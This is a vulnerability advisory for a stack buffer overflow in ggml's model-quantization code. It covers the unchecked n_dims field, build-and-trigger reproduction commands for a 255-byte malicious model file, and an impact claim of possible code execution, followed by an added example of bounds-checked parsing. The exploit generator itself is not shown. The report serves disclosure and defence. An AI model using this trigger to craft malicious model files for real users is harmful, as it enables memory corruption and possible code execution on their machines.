GGML common-ggml.cpp - Stack Buffer Overflow (CWE-121)
A crafted 255-byte model file causes a stack buffer overflow in gpt-2-quantize / gpt-j-quantize with attacker-controlled data, enabling potential code execution.
Vulnerability
File: examples/common-ggml.cpp:113-116 in ggml_common_quantize_0()
Root Cause: n_dims is read from the model file with no bounds check, then used to index int32_t ne[4]. Setting n_dims > 4 writes attacker-controlled data past the 16-byte stack array.
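One way to close the gap described above, as an added example (not code from ggml or from this report): a reader that validates the file-supplied n_dims against the array capacity before any write into ne[]. The simplified layout (n_dims followed by its extents), the accepted range 1..4, and the names read_tensor_dims, pack and parse_bytes are assumptions made for illustration.

```cpp
#include <cstdint>
#include <initializer_list>
#include <iostream>
#include <sstream>
#include <string>

constexpr int32_t kMaxDims = 4;  // capacity of the ne[4] array named above
enum class ParseResult { Ok, Truncated, BadDims, BadExtent, Overflow };

// Reads one int32 in host byte order; false on a short read.
static bool read_i32(std::istream &in, int32_t &out) {
    in.read(reinterpret_cast<char *>(&out), sizeof(out));
    return in.gcount() == static_cast<std::streamsize>(sizeof(out));
}

// Assumed simplified layout: n_dims, then n_dims extents (not the full ggml header).
ParseResult read_tensor_dims(std::istream &in, int32_t (&ne)[kMaxDims], int64_t &nelements) {
    int32_t n_dims = 0;
    if (!read_i32(in, n_dims)) return ParseResult::Truncated;
    // The missing check: validate the file-supplied count before any ne[i] write.
    if (n_dims < 1 || n_dims > kMaxDims) return ParseResult::BadDims;
    nelements = 1;
    for (int32_t &e : ne) e = 1;
    for (int32_t i = 0; i < n_dims; ++i) {
        int32_t dim = 0;
        if (!read_i32(in, dim)) return ParseResult::Truncated;
        if (dim <= 0) return ParseResult::BadExtent;
        // Keep the product within int32 range so later size math cannot wrap.
        if (nelements > INT32_MAX / dim) return ParseResult::Overflow;
        ne[i] = dim;
        nelements *= dim;
    }
    return ParseResult::Ok;
}

// Constructed sample input: packs int32 values as a raw file read would see them.
std::string pack(std::initializer_list<int32_t> vals) {
    std::string s;
    for (int32_t v : vals) s.append(reinterpret_cast<const char *>(&v), sizeof(v));
    return s;
}
ParseResult parse_bytes(const std::string &bytes, int64_t &nelements) {
    std::istringstream in(bytes);
    int32_t ne[kMaxDims];
    return read_tensor_dims(in, ne, nelements);
}
int main() {
    int64_t n = 0;
    bool rejected = parse_bytes(pack({32, 1, 1}), n) == ParseResult::BadDims;
    std::cout << "n_dims=32 rejected: " << rejected << "\n";
    return rejected ? 0 : 1;
}
```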
Reproduction
```bash
# Generate the malicious model file
python3 gen_stack_overflow_v2.py

# Build ggml with AddressSanitizer
git clone https://github.com/ggerganov/ggml && cd ggml
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug \
  -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
  -DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
make -j4 gpt-2-quantize

# Trigger crash
./bin/gpt-2-quantize malicious_gpt2_v2.bin output.bin q4_0
# Result: Segmentation fault (without ASan) / ASan: stack-buffer-overflow (with ASan)
```
Files
| File | Description |
|---|---|
| malicious_gpt2_v2.bin | 255-byte malicious GPT-2 model file (n_dims=32) |
| gen_stack_overflow_v2.py | Python generator script |
Impact
Stack buffer overflow with attacker-controlled data. Overwrites saved registers, return address, and adjacent stack variables in ggml_common_quantize_0(). Potential for arbitrary code execution when a user quantizes a malicious model file.
Tested Version
ggml 0.11.0 (commit ac6f7b44f60fde0091f0b3d99afde48f8c99b13a)